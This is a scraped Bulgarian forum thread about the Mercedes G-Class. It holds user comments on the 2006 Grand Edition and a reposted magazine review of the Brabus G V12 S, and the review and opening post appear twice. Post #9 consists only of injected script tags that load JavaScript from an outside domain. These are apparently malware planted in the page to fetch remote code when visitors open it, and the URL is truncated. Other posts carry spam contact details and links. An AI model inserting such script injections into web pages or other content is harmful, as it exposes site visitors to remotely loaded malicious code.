Мерцедес Бенц G класGrand Edition - джип за ценитeли
Started by ENOXELA, 09 Mar 2006 - 19:04:59
17 replies to this topic
#1
Posted 09 March 2006 - 19:04
Всички очакваха, че след пускането на новия ML клас и новата линия GL клас, Даймлер-Крайслер ще прекрати производството на легендата G клас, което се произвежда от 1979г. и от нея са продадени 185 000 бройки. Компанията не само реши да запази производството му, но не спира да го осъвършенства за да е винаги в крак с последните технологии и модни тедненции.
През март месец излиза специална лимитирана серия Grand Edition. Бройката ще бъде 1000 автомобила, като всичките ще са в цвят "allanite" Ще се предлага само дългата база и на двигателите G 500 (296к.с.) и G 400CDI (250к.с.). Цената и на двете модификации е 74,600 евро без включен ДДС и акциз.
През март месец излиза специална лимитирана серия Grand Edition. Бройката ще бъде 1000 автомобила, като всичките ще са в цвят "allanite" Ще се предлага само дългата база и на двигателите G 500 (296к.с.) и G 400CDI (250к.с.). Цената и на двете модификации е 74,600 евро без включен ДДС и акциз.
#2
Posted 29 March 2006 - 19:40
Алех много си прав ... макар след толкова години все още се произвежда това означава че се харесва..и до колкото знам е един от най добрите оффроад джипове!
Mercedes-Benz W201
#3
Posted 14 May 2006 - 14:34
#4
Posted 04 March 2007 - 18:06
това е просто един невероятен джип. много добра комбинация от функционалност, мощ, дизайн и проходимост.
#5
Posted 30 July 2007 - 18:38
Оригиналните фарове по ми харесват... Така е някак си "горублянска"
И американците не ги разбирам - фаровете на техните изпълнения на Мерцедес са ужасни - трябва всеки фар да си е със собствено стъкло... Това някакъв закон ли е при тях или????
#7
Posted 17 December 2007 - 13:55
Не е един от най-добрите ОФФ РОУД джипове, а е най-добрият!!!Алех много си прав ... макар след толкова години все още се произвежда това означава че се харесва..и до колкото знам е един от най добрите оффроад джипове!
"Не ходи накъдето те води пътя. Вместо това тръгни натам, където няма пътища и ги прокарай!"
#8
Posted 17 December 2007 - 17:26
http://zazz.bg/play:2473d781Не е един от най-добрите ОФФ РОУД джипове, а е най-добрият!!!
http://zazz.bg/play:75311640
http://zazz.bg/play:63f4af1a
http://zazz.bg/play:304933f1
#9
Posted 06 September 2009 - 16:30
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#10
Posted 18 October 2009 - 17:55
скоро ше дойда на някоя среща със Г-класа
Автоморга-Мерцедес-0876/438-583
www.mercedes.mobile.bg
www.mercedes.mobile.bg
#11
Posted 28 October 2009 - 10:08
Автоморга-Мерцедес-0876/438-583
www.mercedes.mobile.bg
www.mercedes.mobile.bg
#12
Posted 05 November 2009 - 14:47
Brabus G V12 S: Gрандомания
13.07.2009 | Коментари: 13
700 конски сили мощност, 1100 нютонметра максимален въртящ момент – и това в тежащата над 2,5 тона G-класа на Brabus с цена 450 000 евро. Икономическа криза ли? Не за всички...
Една от възможните причини за съществуването на Brabus G V12 S е нуждата някой да оповести края на купона... Днес, когато дори средностатистическият руски олигарх старателно къта последните си милиарди, чудовищната G-класа изглежда като мил спомен от времената, в които всичко изглеждаше наред – когато акциите носеха истински дивиденти, а банките имаха реални пари.
В един паралелен свят
Днес Brabus G V12 S стои пред нас с навъсен поглед към обруления от кризата свят, чието последно желание е да бъде тормозен от екземпляр с мощността на болид от Формула 1, тегло колкото на три Smart Fortwo, цена, срещу която спокойно може да си купите уютна вила в някое от най-скъпите кътчета на Стария континент, и емисии на CO2, за които по-удобна и прегледна би била единицата килограм на километър.
При G-класата теорията на еволюцията има доста странни измерения. В момента моделът е на 30 години – достойна възраст, на която повечето автомобили празнуват 20 години от свалянето си от производство... Но не и G-класата с нейните модерни дневни светлини със светодиоди, DVD-плеър и мощност 700 к. с. Всичко това звучи доста странно, когато говорим за несъмнения доайен в гамата на Mercedes, чиято версия 240 GD, отбелязала премиерата си през 1979 година, разполага с не повече и не по-малко от 72 к. с. и развива максимална скорост от 117 км/ч. Твърде, твърде скромно за клиентите на общо петте произведени до момента G V12 S, за които явно не са достатъчно впечатляващи нито 507-те коня на най-мощната фабрична модификация G 55 AMG, нито 610-те к. с. на G V12, предлаган в гамата на Brabus от 2004 година насам. Именно за да задоволят техните изисквания, момчетата от Ботроп са прибегнали до разработката на S-версия на чудовището, инсталирайки задвижващия агрегат на Bullit под капака на G-класата.
Сурова сила
Екстремният мотор е създаден на основата на 5,5-литровия V12 битурбодвигател на S 600, който и без друго е известен с фантастичните си динамични характеристики. Усиленият колянов вал е изцяло нов, а по-големите бутала и увеличеният диаметър на цилиндрите са довели до нарастване на работния обем до 6,3 литра. С цел подобряване на ефективността, всеки цилиндър се захранва по отделен канал от нарасналите по размер турбокомпресори с максимално налягане 1,3 бара, а крайната мощност достига потресаващите 700 к. с. Максимумът в кривата на въртящия момент остава постоянен в изключително широк диапазон, а стойността му от 1100 Нм е изумителна – при това с уговорката, че електрониката отнема 220 Нм от реалните възможности, за да предпази силовия тракт от евентуално претоварване.
Ходовата част е подсилена с компоненти от бронираната версия на G-класата, като стоманената носеща рама е изцяло съхранена и продължава да изглежда все така непоклатимо солидна. Интериорът е стилно обзаведен с комбинация от фина гладка кожа и алкантара и само няколко видими болта напомнят за прагматичните корени на автомобила. G-класата не се свени да кокетничи с достолепната си възраст - броят на блокажите на диференциалите (три) продължава да бъде по-голям от този на въздушните възглавници (две), а неописуемото излъчване на каросерията, съперничеща по елегантност на кахлена печка, в случая се допълва от свенливо стърчащите изпод праговете кюнци на ауспуховите тръби...
Party Time
Краткото завъртане на контактния ключ предизвиква брутален рев от четирите дула на изпускателната система, достойни за злобния саундтрак на тунингования V12. Време е скоростният лост да премине в позиция D, а десният крак на водача да заеме мястото си върху педала на газта. Едно леко трепване с палеца е достатъчно, за да стопи последното поколение на Golf GTI до точка в огледалото за обратно виждане, а ако настъпите газта докрай, времето сякаш спира за около секунда. В този миг на трепет трансмисията връща две предавки надолу, а турбокомпресорите си поемат въздух. Следва неописуем рев и G V12 S излита напред като футболна топка при изпълнение на дузпа...
При изпреварване е добре първо да се изнесете вляво и чак след това да ускорявате, защото опасността да не успеете да насочите своевременно G-класата по безопасна траектория е напълно реална. При деактивирана система ESP мощността идва в повече дори и на безкомпромисната система за задвижване на четирите колела и нерядко се стига до превъртане на гуми и вибрации в доста флегматичната и пестелива по отношение на обратната връзка с пътя кормилна уредба.
По правите V12 S набира скорост със смазващия устрем на лавина, но смяната на посоката при него изглежда почти толкова трудна за постигане, колкото и при споменатото природно бедствие. Тази версия на G-класата определено не обича завоите, където електрониката се намесва толкова енергично, че прави автомобила не много по-бърз от едновремешния 240 GD. Въпреки спортното окачване и широките гуми динамичното пътно поведение категорично си остава чужда територия за свръхмощния колос.
В края на незабравимите часове с Brabus G V12 S спираме сред хладния полъх на пролетната гора, неспособен да разсее горещината от двигателя, стелеща се над предния капак. Погледът на автомобила към заобикалящия свят остава все така мрачен и предизвикателен, сякаш иска да каже – „Драги, купонът може и да свършва, но финалното парти няма да мине без мен!”
Текст: Себастиан Ренц
Снимки: Ханс-Дитер Зойферт
Source: http://ams.bg/?act=c...ontent&rec=5975
13.07.2009 | Коментари: 13
700 конски сили мощност, 1100 нютонметра максимален въртящ момент – и това в тежащата над 2,5 тона G-класа на Brabus с цена 450 000 евро. Икономическа криза ли? Не за всички...
Една от възможните причини за съществуването на Brabus G V12 S е нуждата някой да оповести края на купона... Днес, когато дори средностатистическият руски олигарх старателно къта последните си милиарди, чудовищната G-класа изглежда като мил спомен от времената, в които всичко изглеждаше наред – когато акциите носеха истински дивиденти, а банките имаха реални пари.
В един паралелен свят
Днес Brabus G V12 S стои пред нас с навъсен поглед към обруления от кризата свят, чието последно желание е да бъде тормозен от екземпляр с мощността на болид от Формула 1, тегло колкото на три Smart Fortwo, цена, срещу която спокойно може да си купите уютна вила в някое от най-скъпите кътчета на Стария континент, и емисии на CO2, за които по-удобна и прегледна би била единицата килограм на километър.
При G-класата теорията на еволюцията има доста странни измерения. В момента моделът е на 30 години – достойна възраст, на която повечето автомобили празнуват 20 години от свалянето си от производство... Но не и G-класата с нейните модерни дневни светлини със светодиоди, DVD-плеър и мощност 700 к. с. Всичко това звучи доста странно, когато говорим за несъмнения доайен в гамата на Mercedes, чиято версия 240 GD, отбелязала премиерата си през 1979 година, разполага с не повече и не по-малко от 72 к. с. и развива максимална скорост от 117 км/ч. Твърде, твърде скромно за клиентите на общо петте произведени до момента G V12 S, за които явно не са достатъчно впечатляващи нито 507-те коня на най-мощната фабрична модификация G 55 AMG, нито 610-те к. с. на G V12, предлаган в гамата на Brabus от 2004 година насам. Именно за да задоволят техните изисквания, момчетата от Ботроп са прибегнали до разработката на S-версия на чудовището, инсталирайки задвижващия агрегат на Bullit под капака на G-класата.
Сурова сила
Екстремният мотор е създаден на основата на 5,5-литровия V12 битурбодвигател на S 600, който и без друго е известен с фантастичните си динамични характеристики. Усиленият колянов вал е изцяло нов, а по-големите бутала и увеличеният диаметър на цилиндрите са довели до нарастване на работния обем до 6,3 литра. С цел подобряване на ефективността, всеки цилиндър се захранва по отделен канал от нарасналите по размер турбокомпресори с максимално налягане 1,3 бара, а крайната мощност достига потресаващите 700 к. с. Максимумът в кривата на въртящия момент остава постоянен в изключително широк диапазон, а стойността му от 1100 Нм е изумителна – при това с уговорката, че електрониката отнема 220 Нм от реалните възможности, за да предпази силовия тракт от евентуално претоварване.
Ходовата част е подсилена с компоненти от бронираната версия на G-класата, като стоманената носеща рама е изцяло съхранена и продължава да изглежда все така непоклатимо солидна. Интериорът е стилно обзаведен с комбинация от фина гладка кожа и алкантара и само няколко видими болта напомнят за прагматичните корени на автомобила. G-класата не се свени да кокетничи с достолепната си възраст - броят на блокажите на диференциалите (три) продължава да бъде по-голям от този на въздушните възглавници (две), а неописуемото излъчване на каросерията, съперничеща по елегантност на кахлена печка, в случая се допълва от свенливо стърчащите изпод праговете кюнци на ауспуховите тръби...
Party Time
Краткото завъртане на контактния ключ предизвиква брутален рев от четирите дула на изпускателната система, достойни за злобния саундтрак на тунингования V12. Време е скоростният лост да премине в позиция D, а десният крак на водача да заеме мястото си върху педала на газта. Едно леко трепване с палеца е достатъчно, за да стопи последното поколение на Golf GTI до точка в огледалото за обратно виждане, а ако настъпите газта докрай, времето сякаш спира за около секунда. В този миг на трепет трансмисията връща две предавки надолу, а турбокомпресорите си поемат въздух. Следва неописуем рев и G V12 S излита напред като футболна топка при изпълнение на дузпа...
При изпреварване е добре първо да се изнесете вляво и чак след това да ускорявате, защото опасността да не успеете да насочите своевременно G-класата по безопасна траектория е напълно реална. При деактивирана система ESP мощността идва в повече дори и на безкомпромисната система за задвижване на четирите колела и нерядко се стига до превъртане на гуми и вибрации в доста флегматичната и пестелива по отношение на обратната връзка с пътя кормилна уредба.
По правите V12 S набира скорост със смазващия устрем на лавина, но смяната на посоката при него изглежда почти толкова трудна за постигане, колкото и при споменатото природно бедствие. Тази версия на G-класата определено не обича завоите, където електрониката се намесва толкова енергично, че прави автомобила не много по-бърз от едновремешния 240 GD. Въпреки спортното окачване и широките гуми динамичното пътно поведение категорично си остава чужда територия за свръхмощния колос.
В края на незабравимите часове с Brabus G V12 S спираме сред хладния полъх на пролетната гора, неспособен да разсее горещината от двигателя, стелеща се над предния капак. Погледът на автомобила към заобикалящия свят остава все така мрачен и предизвикателен, сякаш иска да каже – „Драги, купонът може и да свършва, но финалното парти няма да мине без мен!”
Текст: Себастиан Ренц
Снимки: Ханс-Дитер Зойферт
Source: http://ams.bg/?act=c...ontent&rec=5975
#13
Posted 05 November 2009 - 21:45
Е таквоз чудо му сменяхме гумите преди 2-3 дена в сервиза на бащата....още ме държи ерекцията... звука е нещо нечовешко да не говориме колко стилно е пипнато отвътре....
#14
Posted 16 November 2009 - 21:18
има ли такова чудовище в БГ
Автоморга-Мерцедес-0876/438-583
www.mercedes.mobile.bg
www.mercedes.mobile.bg
#15
Posted 18 November 2009 - 02:09
има ли такова чудовище в БГ
ДАм... на армеец е.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users